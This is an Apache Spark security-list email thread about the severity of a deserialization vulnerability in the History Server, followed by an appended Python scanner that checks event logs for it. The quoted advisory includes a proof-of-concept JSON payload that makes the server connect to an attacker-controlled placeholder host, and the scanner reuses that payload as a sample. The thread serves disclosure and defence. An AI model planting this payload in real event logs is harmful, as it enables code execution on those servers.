Thank you kindly sir

Best,
Tres
Sent from [Proton Mail](https://proton.me/mail/home) for iOS.

-------- Original Message --------
On Wednesday, 03/18/26 at 09:18 Holden Karau <[email protected]> wrote:

> Hi Tres,
>
> It was initially reported as high but I updated it to low after looking at
> how difficult it was to trigger (existing user required relatively high
> permissions), but looks like there was an additional field to update. I’ll
> take a look and see what I can do to update that.
>
> Cheers,
>
> Holden
>
> Twitter: https://twitter.com/holdenkarau
> Fight Health Insurance:
> [https://www.fighthealthinsurance.com/](https://www.fighthealthinsurance.com/?q=hk_email)
> Books (Learning Spark, High Performance Spark, etc.): https://amzn.to/2MaRAG9
> YouTube Live Streams: https://www.youtube.com/user/holdenkarau
> Pronouns: she/her
>
> On Wed, Mar 18, 2026 at 6:12 AM Tres Pittman <[email protected]> wrote:
>
>> Hi Holden
>>
>> Why does your email say severity is Low?
>>
>> According to GitHub and other sources, severity is actually High
>>
>> Best,
>> Tres
>>
>> Sent from Proton Mail for iOS.
>>
>> -------- Original Message --------
>> On Friday, 03/13/26 at 16:14 Holden Karau <[email protected]> wrote:
>> Severity: low
>>
>> Affected versions:
>>
>> - Apache Spark (org.apache.spark:spark-core_2.13,
>> org.apache.spark:spark-core_2.12) before 3.5.7
>> - Apache Spark (org.apache.spark:spark-core_2.13,
>> org.apache.spark:spark-core_2.12) 4.0.0 before 4.0.1
>>
>> Description:
>>
>> This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are
>> recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the
>> issue.
>>
>> Summary
>>
>> Apache Spark 3.5.4 and earlier versions contain a code execution
>> vulnerability in the Spark History Web UI due to overly permissive Jackson
>> deserialization of event log data. This allows an attacker with access to
>> the Spark event logs directory to inject malicious JSON payloads that
>> trigger deserialization of arbitrary classes, enabling command execution on
>> the host running the Spark History Server.
>>
>> Details
>>
>> The vulnerability arises because the Spark History Server uses Jackson
>> polymorphic deserialization with @JsonTypeInfo.Id.CLASS on
>> SparkListenerEvent objects, allowing an attacker to specify arbitrary class
>> names in the event JSON. This behavior permits instantiating unintended
>> classes, such as org.apache.hive.jdbc.HiveConnection, which can perform
>> network calls or other malicious actions during deserialization.
>>
>> The attacker can exploit this by injecting crafted JSON content into the
>> Spark event log files, which the History Server then deserializes on startup
>> or when loading event logs. For example, the attacker can force the History
>> Server to open a JDBC connection to a remote attacker-controlled server,
>> demonstrating remote command injection capability.
>>
>> Proof of Concept:
>>
>> 1. Run Spark with event logging enabled, writing to a writable directory
>> (spark-logs).
>>
>> 2. Inject the following JSON at the beginning of an event log file:
>>
>> {
>>   "Event": "org.apache.hive.jdbc.HiveConnection",
>>   "uri": "jdbc:hive2://<IP>:<PORT>/",
>>   "info": {
>>     "hive.metastore.uris": "thrift://<IP>:<PORT>"
>>   }
>> }
>>
>> 3. Start the Spark History Server with logs pointing to the modified
>> directory.
>>
>> 4. The Spark History Server initiates a JDBC connection to the attacker’s
>> server, confirming the injection.
>>
>> Impact
>>
>> An attacker with write access to Spark event logs can execute arbitrary code
>> on the server running the History Server, potentially compromising the
>> entire system.
>>
>> This issue is being tracked as SPARK-52381
>>
>> Credit:
>>
>> Alexandre Pujol (Linagora) (finder)
>>
>> References:
>>
>> https://github.com/apache/spark/pull/51312
>> https://github.com/apache/spark/pull/51323
>> https://issues.apache.org/jira/browse/SPARK-52381
>> https://spark.apache.org/
>> https://www.cve.org/CVERecord?id=CVE-2025-54920
>> https://issues.apache.org/jira/browse/SPARK-52381
>>
>> ---------------------------------------------------------------------
>> To unsubscribe e-mail: [email protected]
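A defender-side check suggested by the Details and Proof of Concept sections of the quoted advisory, added here as an example and not part of the original thread or of Apache Spark's own code: a small Python scanner that reads Spark event-log lines (one JSON object per line) and flags any `"Event"` value that is neither a built-in `SparkListener*` short name nor a fully qualified class under `org.apache.spark`. The allowlist pattern, the function names and the sample log lines (which reuse the advisory's PoC shape with its `<IP>`/`<PORT>` placeholders) are assumptions constructed for this example, not values taken from a real deployment.

```python
"""Hunt for unexpected polymorphic "Event" type names in Spark event logs.

Added example (not Spark's code). The History Server described in the
advisory deserializes each event line with Jackson using the "Event"
property as a class name, so a quick triage step is to list every type
name that appears and flag the ones outside the expected namespace.
"""
import json
import re

# Assumption: legitimate events are either the short names Spark writes for
# its built-in listener events ("SparkListenerLogStart", ...) or fully
# qualified class names under org.apache.spark (e.g. SQL UI events).
# Tighten or extend this for your own deployment's custom listeners.
ALLOWED_EVENT = re.compile(
    r"^(SparkListener[A-Za-z0-9]+|org\.apache\.spark\.[A-Za-z0-9_.$]+)$"
)


def classify_line(line: str) -> tuple:
    """Return (verdict, detail) for one event-log line.

    verdict is "ok", "suspicious" (unexpected or missing Event type) or
    "unparseable" (not valid JSON, which also deserves a look: the History
    Server tolerates partial trailing lines, but mid-file garbage does not
    belong in a log Spark wrote itself).
    """
    line = line.strip()
    if not line:
        return ("ok", "blank")
    try:
        obj = json.loads(line)
    except json.JSONDecodeError as exc:
        return ("unparseable", str(exc))
    if not isinstance(obj, dict) or "Event" not in obj:
        return ("suspicious", "no Event key")
    event = obj["Event"]
    if not isinstance(event, str) or not ALLOWED_EVENT.match(event):
        return ("suspicious", f"unexpected Event type: {event!r}")
    return ("ok", event)


def scan_event_log(text: str) -> list:
    """Scan a whole event log; return [(line_no, verdict, detail), ...]
    for every line that is not "ok"."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        verdict, detail = classify_line(line)
        if verdict != "ok":
            findings.append((lineno, verdict, detail))
    return findings


# Constructed sample log: two legitimate-looking lines, one line shaped like
# the advisory's PoC (placeholders kept as in the advisory), one truncated line.
SAMPLE_LOG = "\n".join([
    '{"Event":"SparkListenerLogStart","Spark Version":"3.5.4"}',
    '{"Event":"org.apache.spark.sql.execution.ui.SparkListenerSQLExecutionStart","executionId":0}',
    '{"Event":"org.apache.hive.jdbc.HiveConnection","uri":"jdbc:hive2://<IP>:<PORT>/",'
    '"info":{"hive.metastore.uris":"thrift://<IP>:<PORT>"}}',
    '{"Event":"SparkListenerApplicationEnd","Timestamp":',
])


if __name__ == "__main__":
    for lineno, verdict, detail in scan_event_log(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}: {detail}")
```

The allowlist is a triage aid, not a fix: it will miss a hostile class that happens to live under `org.apache.spark`, and it says nothing about who was able to write to the log directory. The remediation stated in the advisory is upgrading to 3.5.7 / 4.0.1 or later; restricting write access to the event-log directory to the Spark service identity is the complementary control the Impact section points at.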
